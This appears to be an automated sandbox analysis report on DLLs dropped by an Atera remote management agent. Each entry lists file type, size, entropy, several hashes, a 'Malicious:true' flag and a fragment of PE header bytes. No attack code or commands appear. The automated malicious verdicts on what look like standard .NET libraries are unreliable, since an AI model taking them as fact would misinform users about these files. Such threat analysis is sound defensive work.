                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..................0(...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...d...#Strings............#US.........#GUID...........#Blob......................3.................................................."....."...m.....B.............................6.....O.................j.....S.......(...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.817451458749103
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Ye1WmRWaNyb8E9VF6IYinAM+oCaMg1QHpt:YejdEpYinAMxC7qQHD
                                                                                                                                                                                                                                        MD5:B24EAD5E01B04D28A6DC648B73C5411F
                                                                                                                                                                                                                                        SHA1:2558069A63C79391D820B7AF5419B283B142C66D
                                                                                                                                                                                                                                        SHA-256:6978A0B2F1A3768723BB2048DDA4608D98DC2AAE542EAC0A84E4E8550E5591D2
                                                                                                                                                                                                                                        SHA-512:1D3D46FBD502AFFB87A87C90E1EAF899B3AD08CFD5BD67F2C31C75A27EC2EA5562D45B10F62BA20F5E05748451FCC41AA80FA5CF0A37845B5127E3D5BD2A6659
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... .............................._.....@.................................p(..O....@..................0(...`......8'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..h....................&......................................BSJB............v4.0.30319......l.......#~.. ...0...#Strings....P.......#US.T.......#GUID...d.......#Blob......................3............................................................f...........z.................y...../.....H.................c.....L.......,...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.(...K.H...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):142384
                                                                                                                                                                                                                                        Entropy (8bit):6.160867202254787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:6UGrszKKLBFa9DvrJGeesIf3afNs2AldfIQx:NBFd3/aFs2k
                                                                                                                                                                                                                                        MD5:1AF902AE58A5285D4C984667CA4DB012
                                                                                                                                                                                                                                        SHA1:3E76782E513AE584FCE02EDB4C6AB3BF745EC2BD
                                                                                                                                                                                                                                        SHA-256:2A93490DC647A7E6C4F25C39DB121B3BA7DA40220823CF5097B19748714F6786
                                                                                                                                                                                                                                        SHA-512:33EE31D1D8C3F64C53BCA3404944238C69B3D1451B9DAE91A55E3ACA6FFD840C93790DAEE328A558E68921B0FBE3CE97FDA72A88148A5DD1E70FA6211181B1C8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`............@.................................X...O.... ..0...............0(...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):192560
                                                                                                                                                                                                                                        Entropy (8bit):6.115118172678002
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BeruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgUq:EW60VcTvakcXcApO+
                                                                                                                                                                                                                                        MD5:F7F8A451FC433CE0BD62643595B07505
                                                                                                                                                                                                                                        SHA1:EC61EA54A820C4EC49C197C75D5D073F75E67594
                                                                                                                                                                                                                                        SHA-256:CCE9540674F12073E33383FAFCDE9833E422B2051C6541A01CE3926E7501502F
                                                                                                                                                                                                                                        SHA-512:648B1A6DFF07AA9FB25E8EB639AEAD1D8DD64B9318D32EDE13ECF4D7828FE5F75EC7A59FF088A334807FF2EA5681C25C56665C32D5033514984247637C8505CE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.................. ........... ....................... ............@.....................................O.......h...............0(........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........$..H...........$....,...........................................0..,........ ....1.r...ps0...z.............(.....s1...*.0..l........J.2..J.o2...2.r...ps0...z..Jo3....%36.o2....JY.2*..J.Xo3.....J.Xo3...(...... ........J.XT.*...J...XT.o3...*..o2....Y./..*..o3....%3 ...Xo3......Xo3...(.... .......*.*..0..=..........J...XT..%....J...XT.~..... ...._.c.....J...XT.~......._..*....0............02...91...A2...F1...a2...f1. ....*..91...F1...aY+...AY..X+...0Y...02...91...A2...F

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.840535349441126
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:hZsxgyrWYLW5lSNyby2sE9jBF6IYiYF8pA5K+oCGUHF5LxLC8MbPn:36ZWYLWyNyb8E9VF6IYinAM+oCNNLJwP
                                                                                                                                                                                                                                        MD5:8096FAF3898FE1D997791E2BA67526B5
                                                                                                                                                                                                                                        SHA1:66540D13EC95BAD099B1ED7C4E0970D442E4E559
                                                                                                                                                                                                                                        SHA-256:C694ABA5A2D2637B542DD24D7495932074DF88A9BED56B62AB4B452405B9C537
                                                                                                                                                                                                                                        SHA-512:D9AFBB5E6C88738296305CE95FEA38CFDB91FF5CBF148C6EC324AC883FC4CD8D3D5C8A6C02AC107EDF70BE8FA9BCB9BD337912F34549164D792F03F2976C4F60
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................!w....@.................................T(..O....@.. ...............0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......0...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.791361913629093
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Yk14xPxHWMQW5YGNyby2sE9jBF6IYiYF8pA5K+oCGUHFKHdLoxp:/1W1WMQWrNyb8E9VF6IYinAM+oCuH0p
                                                                                                                                                                                                                                        MD5:071286F1990E176FA76CF2D61F4AD4DD
                                                                                                                                                                                                                                        SHA1:CB830CFEC4163C383AD33C24DD569CF8BA59F1A7
                                                                                                                                                                                                                                        SHA-256:3B80E8D1641F6F3E65B0BD0FE75072B7A0E7CE8983BAFCC6EB0009341C1970AA
                                                                                                                                                                                                                                        SHA-512:355AC67C426D74675AF1D893F685D33ED74340570C81F9015FFA9C8B67D56865A16594CEF91BD5D7F79CD7A0DB48A87E9F2C6E3686C32E17EB4F6CE830AE2B85
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............,... ...@....... ...............................*....@..................................,..O....@..@...............0(...`......p+............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....t.......#US.x.......#GUID...........#Blob......................3................................!...............E.................%.................'...........e.....~...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.831669015029541
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:pQ/rx72WSKW5xjNyby2sE9jBF6IYiYF8pA5K+oCGUHFA/kYkY:adSWSKWvNyb8E9VF6IYinAM+oCsDkY
                                                                                                                                                                                                                                        MD5:C89609756876CD7CDFFB186B82FA9FF9
                                                                                                                                                                                                                                        SHA1:10EA95CCCBD6EBA9918170B0C29EFD94B95B40A2
                                                                                                                                                                                                                                        SHA-256:A48E8269FCE970FF7841A436DE717557076E1F0FE870BBA2AFF8879FD629EC38
                                                                                                                                                                                                                                        SHA-512:00991A94AB06CAC0453A97C9D5A80A60BB5FA07229A9DE1DACC87BF6B12CFCFEC35827960ACCD7805497E6B6E1BD6818C1089CBAFC1CE642F62232C9C525EEF5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..................0(...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...L...#Strings....l.......#US.p.......#GUID...........#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.747975378104776
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6JEYA2WkIWhNyb8E9VF6IYinAM+oC1IZd2ir:6yYA8vEpYinAMxC+ZNr
                                                                                                                                                                                                                                        MD5:526D05F47BB1A1D496DEBA1A65335DE3
                                                                                                                                                                                                                                        SHA1:ECA434B0141344B2E8D1C07D357B6AB7FC9B5BC2
                                                                                                                                                                                                                                        SHA-256:6C3CC500F7754AE90DDBEA82AE89929D44B9B34EF19BC6EA803D9529CEF7EBF2
                                                                                                                                                                                                                                        SHA-512:0EFF33AFD3314945F6DC3740762CE9DE9222439E4E3A0524CDBFD7EEB54A87DEAC423206C1472701DE48B26B4CEC025196DA65B7B1B185A29746B3BAE64346E1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ....................................@................................. ,..O....@..................0(...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l.......#~..|...x...#Strings............#US.........#GUID...........#Blob......................3......................................$.........N.U.....U.....-...u.................0...........n.........................>.......................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.875300844233776
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:GJGWe4WENyb8E9VF6IYinAM+oC5OBcPrM:Km6EpYinAMxCbo
                                                                                                                                                                                                                                        MD5:590265DAAFB34F7E4F0A1F96A827EFB6
                                                                                                                                                                                                                                        SHA1:32D20CA35E7FE049A5533A8A42A7F743D74E5036
                                                                                                                                                                                                                                        SHA-256:DB34710E9A661149D59DA23EECB8A3C74C248FA9975B9EF1586424FB64E7799A
                                                                                                                                                                                                                                        SHA-512:C4FCB7E38E7782D938002EFCB6BC14A5F7FE7D0758C5ACF8D3E8ED613983D59769F5D3A376339B53EECD80E4AEBB6682A55710B2A74D7EA071E7459705C58AAD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................wz....@.................................0)..O....@..................0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d)......H.......P ..(...................x'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings............#US.........#GUID...........#Blob......................3..................................................4...~.4...R.!...T.....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.787070160276154
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:adW1w3WesWvNyb8E9VF6IYinAM+oCV4j2:P1wx1EpYinAMxC+C
                                                                                                                                                                                                                                        MD5:A6FA646C6BD8B6402C07B5F4C6B8CA58
                                                                                                                                                                                                                                        SHA1:81A2661413892E25D00E6808CEB422DCD41D6C97
                                                                                                                                                                                                                                        SHA-256:B8FEB34B4C1CDA4D47E5DA294E288C4A76C92818AE376B210C1929A79B8760E4
                                                                                                                                                                                                                                        SHA-512:289CDD78EFA41C00AA496F7468320FDA94D05B865DFBFAFD14048D79CE948F86E90D82514E33E6CD37D6A2E5B9569331CE4CCFC2C09ED13EE0F0E6D83D2B9CCE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............~*... ...@....... ....................................@.................................,*..O....@..................0(...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H.......P ..$...................t(......................................BSJB............v4.0.30319......l...$...#~......t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.<.....<.....<...C.<.....<.....<...[.<...x.<...-.......<.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24624
                                                                                                                                                                                                                                        Entropy (8bit):6.597715284507874
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsWmNyb8E9VF6s:nyp12Bhkg3qnV/sEEpYinAMxCRQ
                                                                                                                                                                                                                                        MD5:50FE1EA3CE088CC760CF5B1623E0A77C
                                                                                                                                                                                                                                        SHA1:5E257421620787A5858322A475A452F76BA065AE
                                                                                                                                                                                                                                        SHA-256:421F5F5264B99701B6FD3FF4BE82F1F4FE4A9446A756216C75ED360E69AE256A
                                                                                                                                                                                                                                        SHA-512:F748A84516B3796FB1735E6EEEE0D9DFD46BD85E4A8F2402A777C27F37D5D982FE94A95FBC5CE763AC310BA0E972354C664F440E24B2B515446908C4B5D36755
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..*...........I... ...`....... ..............................L.....@.................................gI..O....`...............8..0(...........H............................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............6..............@..B.................I......H.......H(... ..................HH.......................................0..J.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%......o....*...0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..K.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%.......o...+*..0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..L.......(....~....%-.&~..........s....%.....~....%-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.85685793500782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3LHPAW1bWPNyb8E9VF6IYinAM+oCJ5VjDx:3TrCEpYinAMxC3
                                                                                                                                                                                                                                        MD5:8D9807170A4A571C1C5831FAB0F9E041
                                                                                                                                                                                                                                        SHA1:4D11A6E2F0FD1EB480C1AAB9A29D5FBD0D2F092A
                                                                                                                                                                                                                                        SHA-256:57E869D189C0568E8A8CBF8BCF174708171B39E2F06EB254D89B75D6D163E1F4
                                                                                                                                                                                                                                        SHA-512:FED3B0D99C3FDDB66788606674B5E4279E3C08C1860B56208B47136EE4874BFFB915CC1A738A0F457CA6604C39527CA3FC32B7923274A867520B2D5E28EBDD19
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................<....@..................................(..O....@..P...............0(...`......P'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3......................................z...............\.....0.....3.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.85606999487658
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:cNoqWD7WXNyb8E9VF6IYinAM+oCeBbtUm:cNofCEpYinAMxCCd
                                                                                                                                                                                                                                        MD5:8F3A6225F7A7E2F11723B3B874D0F20C
                                                                                                                                                                                                                                        SHA1:9D0BF1F31FD593925A933F883C6060DB8B8DD357
                                                                                                                                                                                                                                        SHA-256:D505D62794BE9A172C19A17AFE9423BD17D7FB2DCB3E1A20102E4043B830CAC5
                                                                                                                                                                                                                                        SHA-512:7AB5ABE34FD3F4FC9BE6C946510D2D2CB9C938B3E64A6C8F73502C124B09E80AC584A3BF8DD5593F21EA44C7659B51AD669897FBCC3F88F42DF80BE9F652013E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................|(..O....@..@...............0(...`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.865532201187094
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:BGETSAWUEWvNyb8E9VF6IYinAM+oC6tiRByq:1T1tEpYinAMxCP/
                                                                                                                                                                                                                                        MD5:738BBFB7A8592192CBCEFF5584FF5618
                                                                                                                                                                                                                                        SHA1:6892364BD3957AB4ED2507DC5A70FA85E6485A81
                                                                                                                                                                                                                                        SHA-256:7C24F1EADA09F16B7827E6766F9CD905AD7BE5AC8B20A409E037F327DF3AE02F
                                                                                                                                                                                                                                        SHA-512:37B19642FCBA7C67CB137D8A95630ECB9F906B2D76EF3BAD6B286FFD02D8C939C01C8B3F9515ACB3AAC51BFFEFE53339D60007DB2E81ECA7E09A9B44DCFB9DF3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ...............................y....@..................................(..O....@..................0(...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):110128
                                                                                                                                                                                                                                        Entropy (8bit):5.51231720661361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/i7HxJ:gWw0SUUKBM8aOUiiGw7qa9tK/i3
                                                                                                                                                                                                                                        MD5:B58BFC2378EE763E84EB0D6F33623F49
                                                                                                                                                                                                                                        SHA1:C6602B83CD281FE3EEA1247D47EE4FCAAB0DBF06
                                                                                                                                                                                                                                        SHA-256:6BD75EAC42974E87C19450B0E2EBB2CA462FE0FDFFA367F75548DDE19EB2AFD7
                                                                                                                                                                                                                                        SHA-512:33559A87818C2309B1FD8E279A3D9BB5E3BAAD9D19B1FBA1C942BAB75C41D324AD3C21181323C371327EC350929C578F34638B60013D3C265E1A0B287572AB17
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... .............................."#....@.................................f...O.......................0(.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.847980384791941
                                                                                                                                                                                                                                        Encrypted:false
